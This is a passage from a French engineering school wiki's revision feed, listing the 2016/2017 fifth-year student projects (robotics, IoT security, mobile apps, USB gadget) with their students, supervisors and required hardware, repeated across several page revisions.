&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P15&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;2 téléphones Android&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33707</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33707"/>
				<updated>2016-09-26T11:55:38Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;P15&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;2 téléphones Android&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33706</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33706"/>
				<updated>2016-09-26T11:55:16Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
